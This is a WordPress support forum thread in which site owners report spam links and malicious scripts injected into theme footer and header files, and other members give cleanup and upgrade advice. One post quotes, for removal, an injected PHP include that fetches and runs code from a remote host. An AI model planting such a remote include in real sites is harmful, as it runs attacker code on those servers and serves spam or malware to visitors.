WordPress.org

Ready to get started?Download WordPress

Forums

php get footer adding spam code? (16 posts)

  1. rkeaveney
    Member
    Posted 6 years ago #

    I've recently been notified that my page is serving up some spam code (and apparently a virus). I've been using the sIFR text replacement plugin, which askes for the <?php get_footer(); ?> code be inserted into the footer.php file. However a foreign div loads in the footer "div id=goro", and a list of spam links to various pharmaceuticals on "mojopages.com". I have no idea how this div is loading, but it seems to be tied in to the <?php get_footer(); ?> as disabling it fixes the issue, however I cannot use the sIFR plugin. If anyone is interested in taking a look please let me know and I can modify the code to show the mystery spam div.

  2. whooami
    Member
    Posted 6 years ago #

    the cause of that, just so you know, is not the plugin..

    chances are that the theme you are using is a sponsored one:

    http://wordpress.org/search/sponsored+themes?forums=1

    ^^ much ado about unscrupulous themes and their writers (term provided loosely)

    If you can provide a zip of the complete theme, or give a link to where EXACTLY (the page, exactly, I will NOT hunt a site) you downloaded it from -- I will happily assist in finding the root cause for you, so that you can remove it.

  3. rkeaveney
    Member
    Posted 6 years ago #

    Thank you for replying. The original theme was "Almost Spring", but has since been heavily modified. In fact that was a year ago. Only now have I been made aware of the problem. The site URL is http://www.cinemusic.net.

    Thank you for your help with this.

  4. whooami
    Member
    Posted 6 years ago #

    huh?

    I dont want the original theme link -- She does not and didnt ever add any spam links to her footers.

    Second, this: http://www.cinemusic.net ?? Whats that for?

    --

    I am going to restate what I said above. If you want help YOU need to provide the EXACT page you downloaded the theme from. I dont want your site, unless you are providing a link to download the files. I dont want a link to the theme before it had links to it.

    ------

    On second thought, I browsed your previous posts.

    I'm assuming this is you, yes:

    Klaatu Media specializes in the design and maintenance of websites for film, television and videogame composers, related artists and businesses.

    ?

    Correct me if I am wrong but you are doing paid work for this other site?

    You will need to find someone else to assist you if that is the case, unless of course you are willing to paypal me for my time.

    I apologize if it appears I've led you down some path, It was not intentional, however I have a rule of not willingly assisting ppl that are being paid, unless they are willing to pay me for my time and effort. I assure you it is nothing personal.

  5. rkeaveney
    Member
    Posted 6 years ago #

    I'm confused. When I first moved my website, Cinemusic.net, to WordPress format, I used the Almost Spring theme as a starting point (hence my linking to the exact site I downloaded the theme from, like you asked). I then modified the theme beyond all recognition.

    A year later I get an email saying someone was prompted to download a virus while visiting Cinemusic.net. This was news to me. I viewed the code in Firefox and there in the footer was a list of spam links to "mojopages.com" for xanax, viagre, etc. This code, however, does not appear in any of the WordPress files (footer.php, etc.) I tried a few fixes: I turned off the sIFR plugin as the javascript is inserted at the end of the page. That didn't eliminate the spam code. So I removed <?php get_footer(); ?> from footer.php, reloaded the page, checked the source and the spam links were gone. My question was then how this code was inserted into my page, whether or not it was something I had done to make the site vulnerable, and as an aside, lament that without <?php get_footer(); ?> sIFR would not function.

    I am Klaatu Media and I designed Cinemusic.net. I also run the site, and write the content. I did not get paid to design Cinemusic.net as that would be rather pointless.

    I wasn't looking to suffer the wrath for asking a question. I came to the WordPress community for help. If you can help I'd appreciate it.

  6. al-zarwani
    Member
    Posted 6 years ago #

    I experienced the same, or a very similar problem. Look in your footer file. If you see this, or something like it, remove it:
    <?php include('http://wordpress.net.in/statcounter.php'); ?>

    I also found these two articles helpful:
    http://codex.wordpress.org/Hardening_WordPress
    and
    http://www.reaper-x.com/2007/09/01/hardening-wordpress-with-mod-rewrite-and-htaccess/

  7. rkeaveney
    Member
    Posted 6 years ago #

    Thank you, al-zarwani, helpful tips in the second link. I did some fiddling and seem to have fixed the problem. I'm going to look into securing WordPress to prevent this from happening again.

  8. tgiokdi
    Member
    Posted 6 years ago #

    I've been having this same problem, but only with me, it was some stray JS in the template's header, so be sure to check your header.php template file for ugly unknown JS code. I have both google ads and project wonderful ads running on my site, and I've found the bad code within the advertising code. I compared the code that was listed on the advertising site to what was actually on my own site, and found a huge difference. I've had to make the template files read only to solve this. The only way that I was sure that I got rid of it was to load 'noscript' into firefox and go to the site. It was attempting to load some nefarious scripts from topae.info with the bad code.

    I'm 99% certain that there's either a WP bug or a plugin bug that's causing the problems and permitting someone to edit the files on the server, injecting their spammy code.

    I'm using 2.3.1, with a list of plugins as long as my arm, but I'm willing to provide a list if that would help.

  9. C-Monster
    Member
    Posted 6 years ago #

    i've been getting spam in both my header and footer... and i delete it, but it comes back... i'm a newbie and don't know very much tech. is there a patch for this?

  10. whooami
    Member
    Posted 6 years ago #

    c-monster, dude/dude-ette,

    your site is hacked.

    You dont need a patch, you need a lesson in how to be a responsible web master.

  11. Nazareth
    Member
    Posted 6 years ago #

    I'm getting the exact same thing- spam just keeps returning, and there is nothign in the footer that looks odd to me

    <?php
    /*
    Tiga WordPress Theme

    Copyright (C) 2006 Shamsul Azhar

    This program is free software; you can redistribute it and/or
    modify it under the terms of the GNU General Public License
    as published by the Free Software Foundation; either version 2
    of the License, or (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
    */
    ?>

    <?php wp_footer(); ?>
    <div class="footer">
    <!--
    Please do not remove attribution to me from the bottom of your page
    It's the least that you can do to acknowledge my hard work.
    If you have significantly modified this theme you can add the phrase
    "modified by xxxx".
    -->
    <p>
    <?php
    printf(_t('%s is powered by WordPress'),
    get_bloginfo('name'));
    echo(' | ');
    _te('Using Tiga theme with a bit of Ozh');
    ?>
    </p>
    </div> <!-- footer -->
    </div> <!-- page -->

    ****HERE IS WHERE THE SPAM SHOWS UP*******

    </body>
    </html>

    Has anyone got any suggestions where else to look? I've been all through my files and not knowing webmastering liek some here- it's very difficult- and telling us to 'get a clue' isn't being helpful- not all of us are as code gifted as some here.

  12. whooami
    Member
    Posted 6 years ago #

    Nazareth,

    I'll be brief. Your theme is not a sponsored theme - that is to say, that you are not suffering from what the original poster was having trouble with.

    If you are seeing spam (and I should say that while I dont see what you describe, I do see very suspicious "spaces" in your source at the location you describe), your site has been exploited.

    As to where to look, thats the problem, you should be 'looking'.. what you need to be doing is upgrading..

    <meta name="generator" content="WordPress 2.0.3" />

    Thats the root source of your problem.

    In the process of upgrading you need make sure that you remove and replace ALL of the non plugin files on your site, including your themes files. This advice varies slightly from the normal upgrade instructions, but keep in mind the normal upgrade instructions assume you have a clean site. In fact, were it me, doing the work, I would be removing the plugin files as well, and getting the files anew from their source, OR looking their code for anything that might be suspicious.

    You need to change ALL of your passwords.

    You need to make sure that you have NO unusual files or directories within your web space.

    You need to make sure that you have no rogue users added to your wp install -- and this should be done by looking inside your database.

    Theres more I am sure -- but thats a good start.

  13. Nazareth
    Member
    Posted 6 years ago #

    I'll probably end up having to upgrade no doubt, but doing so won't teach me how to fix the problem, and I'll end up losing all my posts I've done over the last two years? How would I go about saving the posts & all the various links I've collected over the years? Manually reinserting them again? Would be better to find the hole and script, fix it, then upgrade with the theme still inplace wouldn't it?

  14. whooami
    Member
    Posted 6 years ago #

    I'll probably end up having to upgrade no doubt, but doing so won't teach me how to fix the problem,

    The problem, once again, is that you have not upgraded. You're using a version of WP that is known publicly to be exploitable, and unless and until you upgrade your site will probably continue to fall victim to all kinds of maliciousness. So, yes, upgrading will teach you how to solve the problem.

    How would I go about saving the posts & all the various links I've collected over the years?

    http://codex.wordpress.org/Backing_Up_Your_Database

    Manually reinserting them again?

    http://codex.wordpress.org/Restoring_Your_Database_From_Backup

    Would be better to find the hole and script, fix it, then upgrade with the theme still inplace wouldn't it?

    Im not sure I understand that question, but if you are intent on keeping your current theme, thats fine -- but I see no issue with goijng and re-downloading your theme from it's original source, and replacing the files. The download location of your theme is in your footer.

    Its your site, do as you like, but realize that what you do affects the rest of us that share the Internet with you.

  15. Nazareth
    Member
    Posted 6 years ago #

    Well hte problem is that the Tiga theme won't work with WP upgrades & I haven't found a theme I like as well as the Tiga theme- it's got all sorts of neat configs within the theme with what they call Tigerator- you can adjust size color, header etc all in the control panel- I did the WP upgrade last night- clean install, but used automaticc to do the upgrade & it upgraded to WP 2.5, and the Tiga theme is broken- won't show my blogroll, my links, categories etc. (All the links and blogroll and category are listed in my control panel, but they ismply won't show up on my site even though I've made sure the 'make visible' box is checked- Hate the new admin panel in 2.5 WP uggh)

    As well, what I really wanted to learn how to do here was to fix the exploits in the old WP- I'd read soem articles on "Hardening WP" to stop these 'drive by spamming' attacks (which is what was happening I found out- ) because these exploits will become particular to even hte new WP upgrades soon enough & I wanted to learn what to do- where to look, in hte theme files for the vulnerabilities, as the spamming the header.php and footer.php files seems to be a common exploit which the hackers will find a way around even with hte new WP upgrades at some point.

    Yeah- about hte redownloading the old file, the site lists only the new theme- they apparently did away altogether with hte old theme- can't find it anywhere- not that it matters now that I've upgraded.

  16. whooami
    Member
    Posted 6 years ago #

    2 things,

    1. not to rain on your parade, but if you had done the upgrade manually, you could have went to 2.0.11 which would have allowed you to keep that theme, as is.

    2. congrats all the same on the upgrade.

    As well, what I really wanted to learn how to do here was to fix the exploits in the old WP- I'd read soem articles on "Hardening WP" to stop these 'drive by spamming' attacks (which is what was happening I found out- ) because these exploits will become particular to even hte new WP upgrades soon enough & I wanted to learn what to do- where to look, in hte theme files for the vulnerabilities, as the spamming the header.php and footer.php files seems to be a common exploit which the hackers will find a way around even with hte new WP upgrades at some point.

    thats not knowledge that comes in a matter of a few hours, and truthfully, running 2.5.x makes it more difficult than ever since the number of files included in the WP distro has tripled since 2.0.x .. In other words, theres more to learn.

    "Getting to know" wp takes time, and effort, and a good deal of reading, either the codex, or the files themselves. I do applaud the goal though -- there is something to be said for understanding what you are using. I like the feeling.

Topic Closed

This topic has been closed to new replies.

About this Topic